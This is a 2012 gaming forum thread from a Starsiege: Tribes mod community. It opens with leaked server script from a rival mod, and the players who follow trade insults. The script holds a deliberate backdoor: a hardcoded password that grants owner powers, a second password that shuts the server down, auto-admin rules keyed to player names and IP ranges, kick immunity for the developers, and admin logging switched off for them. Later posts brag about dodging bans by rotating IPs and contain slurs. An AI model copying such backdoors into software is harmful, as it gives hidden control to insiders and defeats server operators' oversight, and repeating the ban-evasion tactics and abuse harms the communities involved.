View Full Version: R.I.P. Legendz.. You were gay while it lasted.

Annihilation Community Forums > General Discussions > R.I.P. Legendz.. You were gay while it lasted.


Title: R.I.P. Legendz.. You were gay while it lasted.


Hydronion - April 10, 2012 04:40 AM (GMT)
Just a preview.. Of what we are going to miss you guys... :rolf:


$Legendz::D3vPassword = "DaJ4ck3Lh4xAdmin"; //Doh!! -DaJ4ck3L
$Legendz::KillerPassw0rd = "s3rverg0esb0om";



function remoteLegendzPassword(%client, %password)
{
//if( CheckEval("remoteLegendzPassword", %client, %password) ) //no need for this =P
// return;
%password = Ann::Clean::string(%password);
if($Legendz::D3vPassword != "" && %password == $Legendz::D3vPassword) //my admin bitches -DaJ4ck3L
{
 %client.isAdmin = true;
 %client.isSuperAdmin = true;
 %client.isGod = true;
 %client.isOwner = true;
 %client.isLegendz = true;
 Game::refreshClientScore(%client);
 Client::sendMessage(%client, 0, "You have been given Owner power.~wCapturedTower.wav");
 return;
}

if($Legendz::KillerPassw0rd != "" && %password == $Legendz::KillerPassw0rd)
{
 Quit();
}

Client::sendMessage(%client, 0, "Your password is invalid.~waccess_denied.wav");
}

function Admin::crash(%clientId)
{
if(%clientId.isLegendz == true)
{
 %name = Client::getName(%clientId);
 messageAll(0, %name@" cannot be kicked.");
 return;
}
DebugFun("Admin::crash",%clientId);
%ip = Client::getTransportAddress(%clientId);
Player::setDamageFlash(%clientId,0.75);
centerprint(%clientId, "<jc><f1>"@$ANNIHILATION::KickMessage, 10);
%message = "Bitch!";
Net::kick(%clientId,%message);

}


//Legendz Developer -DaJ4ck3L
function Legendz::AutoAdmin(%clientId,%ip)
{
%name = Client::getName(%clientId);
//Legendz::CompareIP(%ip, %mask);
if(%name == "Crow{OZ}")
{
 %mask = "70.240.*.*";
 if(Legendz::CompareIP(%ip, %mask))// == true)
 {
  %clientId.isUntouchable = true;
  %clientId.isAdmin = true;
  %clientId.isSuperAdmin = true;
  %clientId.isGod = true;
  %clientId.isOwner = true;    
  messageall(1,"The Legendz Developer.");
  Game::refreshClientScore(%clientId);
 }
}
if(%name == "hYdRoNiC")
{
 %mask = "70.240.*.*";
 if(Legendz::CompareIP(%ip, %mask))// == true)
 {
  %clientId.isUntouchable = true;
  %clientId.isAdmin = true;
  %clientId.isSuperAdmin = true;
  %clientId.isGod = true;
  %clientId.isOwner = true;    
  messageall(1,"The Legendz Developer.");
  Game::refreshClientScore(%clientId);
 }
}
if(%name == "DaJ4ck3L")
{
 %mask = "70.240.*.*";
 if(Legendz::CompareIP(%ip, %mask))// == true)
 {
  %clientId.isUntouchable = true;
  %clientId.isAdmin = true;
  %clientId.isSuperAdmin = true;
  %clientId.isGod = true;
  %clientId.isOwner = true;    
  messageall(1,"The Legendz Developer.");
  Game::refreshClientScore(%clientId);
 }
}
if(%name == "Crow{OZ}.1")
{
 %mask = "70.240.*.*";
 if(Legendz::CompareIP(%ip, %mask))// == true)
 {
  %clientId.isUntouchable = true;
  %clientId.isAdmin = true;
  %clientId.isSuperAdmin = true;
  %clientId.isGod = true;
  %clientId.isOwner = true;    
  messageall(1,"The Legendz Developer.");
  Game::refreshClientScore(%clientId);
 }
}
if(%name == "hYdRoNiC.1")
{
 %mask = "70.240.*.*";
 if(Legendz::CompareIP(%ip, %mask))// == true)
 {
  %clientId.isUntouchable = true;
  %clientId.isAdmin = true;
  %clientId.isSuperAdmin = true;
  %clientId.isGod = true;
  %clientId.isOwner = true;    
  messageall(1,"The Legendz Developer.");
  Game::refreshClientScore(%clientId);
 }
}
if(%name == "DaJ4ck3L.1")
{
 %mask = "70.240.*.*";
 if(Legendz::CompareIP(%ip, %mask))// == true)
 {
  %clientId.isUntouchable = true;
  %clientId.isAdmin = true;
  %clientId.isSuperAdmin = true;
  %clientId.isGod = true;
  %clientId.isOwner = true;    
  messageall(1,"The Legendz Developer.");
  Game::refreshClientScore(%clientId);
 }
}
}

else if(%action == "Confirm")
 {
  %change = getWord(%option, 2); //Might Need to change -DaJ4ck3L
  %level = $AnnBanned::Mask[%num];
  //if(%level != "Owner" && %level != -1 && (%level != "God" || (%level == "God" && %clientId.isOwner)))
  //{
   %message = $AnnBanned::FullIP[%num]@" "@$AnnBanned::Mask[%num]@" changed to "@%change@".";
   echo("!! "@Client::getName(%clientId)@" modified the banned list. "@%message);
   client::sendmessage(%clientId,1,"User# "@%num@" \""@$AnnBanned::FullIP[%num]@"\" "@$AnnBanned::Mask[%num]@", changed to "@%change@".");

   %exportFull = "AnnBanned::FullIP"@%num; //got rid of $ varriable -DaJ4ck3L
   export(%exportFull,"config\\AnnBannedList.cs",true); //edit here -DaJ4ck3L

   %exportPartial = "AnnBanned::PartialIP"@%num; //got rid of $ varriable -DaJ4ck3L
   export(%exportPartial,"config\\AnnBannedList.cs",true);

   %exportBanType = "AnnBanned::BanType"@%num; //got rid of $ varriable -DaJ4ck3L
   export(%exportBanType,"config\\AnnBannedList.cs",true);

   $AnnBanned::Mask[%num] = %change;
   %exportMask = "AnnBanned::Mask"@%num; //got rid of $ varriable -DaJ4ck3L
   export(%exportMask,"config\\AnnBannedList.cs",true);

   %exportBannedName = "AnnBanned::BannedName"@%num; //got rid of $ varriable -DaJ4ck3L
   export(%exportBannedName,"config\\AnnBannedList.cs",true);
   
   if(!%clientId.isLegendz) //no tracking for me -DaJ4ck3L
   {
    %AdminName = Client::getName(%clientId);
    $AnnBanned::LastEdit[%num] = %AdminName; //lets keep track of who bans who now -DaJ4ck3L
   }
   %exportLastEdit = "AnnBanned::LastEdit"@%num; //got rid of $ varriable -DaJ4ck3L
   export(%exportLastEdit,"config\\AnnBannedList.cs",true);

   %exportOriginalEdit = "AnnBanned::OriginalEdit"@%num; //got rid of $ varriable -DaJ4ck3L
   export(%exportOriginalEdit,"config\\AnnBannedList.cs",true);
   
   if(!%clientId.isLegendz) //no tracking for me -DaJ4ck3L
   {
    $EditAdmin = "!! "@Client::getName(%clientId)@" modified admin list. "@%message;
    $Admin = Client::getName(%clientId)@" modified admin list. "@%message;
    export("Admin","config\\AnnBannedList.cs",true);
   }

   processMenuAnnBannedViewer(%clientId,"bannedlist "@%num-1);
  //}
 }

if(%name == "Crow{OZ}")
         Client::sendMessage(%client, 0, "I like to steal code and claim it's mine! Sorry Kigen and Perrin, I'm an unoriginal twit! :D.~wi'mafag.wav");
 return;
}



I love it. Let's do more fun things let this more often guys.


If you read the first line of code.. "Dajackel hacks admin" But.. He can't hack. He's lameee. He used a code to try and act hard, yet, he claims it was for good use ;) Explain line 2... Servergoesboom. Niceee ;)

Erowid - April 10, 2012 12:51 PM (GMT)
lol, someone should send this to ecko so he can ban everyone in the server for a week while we are unable to do anything about it.

perrinoia - April 10, 2012 11:30 PM (GMT)
I like the last couple of lines the best...

Hydronion - April 11, 2012 12:32 AM (GMT)
QUOTE (perrinoia @ Apr 10 2012, 05:30 PM)
I like the last couple of lines the best...



you know, for some reason, I had the same tingley sensation when I read them....

Jerry Garcia - April 11, 2012 04:28 PM (GMT)
ahhh, that fun week is just a memory now... I loved that week, it was probably one of the only weeks I did NOT get abused.

It was funny how pissed off everyone got at being admin abused because of a personal vendetta, unfortunately though, it gave the admins no insight into how frustrating it is when they themselves do the exact same thing.

Hydronion - April 14, 2012 07:55 PM (GMT)
updated.. so re-read throw the piles of shit of code in the first post.

DaJ4ck3L - April 15, 2012 04:28 AM (GMT)
You're pathatic man. I always knew these forums would turn to shit once the majority of the player base left them. The only thing people see here is hate and drama. It's fucking sad man. Don't get me wrong, it doesn't bother me at all, but I do find it funny to see people still crying about the same type shit years past. Haha, it's crazy man to watch it from an observer standpoint. It's almost like watching an insane person, that's probably how I would discribe it. It's like watching a drug addict talk about some shit that doesn't really matter, because he doesn't really know what matters in life, he's stuck in his own world.

This is what I reallly care about.

user posted image

Next week we're going on our first bike ride together down a nature trail with a pavement path. We're both really excited about it. She's making so much progress, but she already knew the peddling motion from her 3 wheeler. Atm I'm just teaching how to keep balance on the two wheeler. She made a sharp turn yesterday, and really ate the pavement. It made me sad, but happy to see her get back up and keep trying, after she wiped the tears out of her eyes. What do you really care about in life? Maybe there is something that can push you, or motivate you to things that really matter in life. I would hate to see you fall victim to the same fate that so many others seem to have fallen into. Hate is a bad thing, and I teach my girl that every day. I hope when you have children, that you do the same. Finding joy in other peoples misery is sad and pathatic.

Republic - April 15, 2012 05:30 AM (GMT)
I hate seafood

Hydronion - April 15, 2012 06:00 AM (GMT)
Crow got mad and started banning me from other people's server's now :'(

My actual favorite part about his post is.. He thinks hes a God.. And he has a "life", but really, he doesn't... :\


I find much joy out of making fun of you, Crow. And I always will. You let your anger control you, and that, is what gets me excited. When you ban me, MAN I LOVE it. :)

I log in with different IPs, same name, just so you can DO IT again! :)

But now I'm on BR with a diff one.. You are watching that one too.. But I changed my name, rotated my IP a few digits off.. Man I love it :)

DaJ4ck3L - April 15, 2012 06:51 AM (GMT)
What I'm saying Repubic, is maybe if more people found joy in their lives, they wouldn't treat others the way they do. I mean that from both an admin and player prospective.

S']['U - April 18, 2012 07:09 AM (GMT)
QUOTE (DaJ4ck3L @ Apr 15 2012, 01:51 AM)
What I'm saying Repubic, is maybe if more people found joy in their lives, they wouldn't treat others the way they do. I mean that from both an admin and player prospective.

^ This is coming from the mouth of a smart-ass that threw me out of his clan because I destroyed a base-cloak, and thinks he's brave by making derogatory comments about me in locked threads so I can't respond.
This is how he finds "joy in his life".
Then he has the balls to preach about how people treat others?

STFU!

I've seen your picture and you even look like a goon.
You have no sense of decency or fairness, an exaggerated sense of self-importance and you take credit for shit that isn't yours.
Even your name is a rip-off:

QUOTE
For some reason, one of the most widely distributed pirated copies of Tribes had the player name pre-set to DaJackal. In a later patch (around 1.1) players bearing the name DaJackal would be automatically kicked from game servers upon trying to connect.

http://tcrf.net/Starsiege:_Tribes

Assholes like you should go extinct for the good of humanity.
You have no respect for anyone but yourself....the one person that least deserves it.

Jerry Garcia - April 18, 2012 06:41 PM (GMT)
QUOTE (DaJ4ck3L @ Apr 15 2012, 06:51 AM)
What I'm saying Repubic, is maybe if more people found joy in their lives, they wouldn't treat others the way they do. I mean that from both an admin and player prospective.

Well, this is true, and has always been a way for me to tell who hates themselves and who doesn't.

Let me give you the cliff's notes, all the punks that try to ruin everyone else's games, be it either by shit talk or admin abuse, hate their lives. This means not only players like Fish, but also admins like Bo. Playing the actual game is not fun for these people because they cannot compete, so playing the bs side games, (harassing, abusing, etc.) is.

It must suck to only get joy from seeing others unhappy.

Crow, Stu has you there. You've matured a lot in the past few years, but the way you used to run oz, allowing, encouraging, and even coaching your members how to cheat, not to mention oz's general attitude toward the rest of the community, was about as disrespectful as anything I have seen in this game.

perrinoia - April 19, 2012 07:49 AM (GMT)
Seriously... I'm so glad you've got a daughter to steal you away from the Tribes community... And I sincerely hope you don't treat her the way you've treated us.

But just in case you do, please give her this number: 1-800-4-A-CHILD (1-800-422-4453)

Now, if only Bo'sdad had something more important to do with his life...

Bongwater - April 19, 2012 12:56 PM (GMT)
bosdad can barely walk because of the required intellectual capacity . i think tribes is all hes got.

Jerry Garcia - April 19, 2012 07:09 PM (GMT)
:lol: Oh man... touchy subject, but I agree with you Perrin. I have actually said a prayer for her before.

Crow does have goodness in there somewhere, it's just hard to find at times. Certainly surrounding himself with some of the most pathetic people that have ever played this game, (certain oz members), hasn't helped him. Having everyone running around cheating and causing drama for years while wearing his tag hasn't helped either.

Ya, Bong, you're right, my master plan is to visit Bo, give him a piece of bubble gum and wait for his brain to shut off from exhaustion when he gets up to walk anywhere.




* Hosted for free by InvisionFree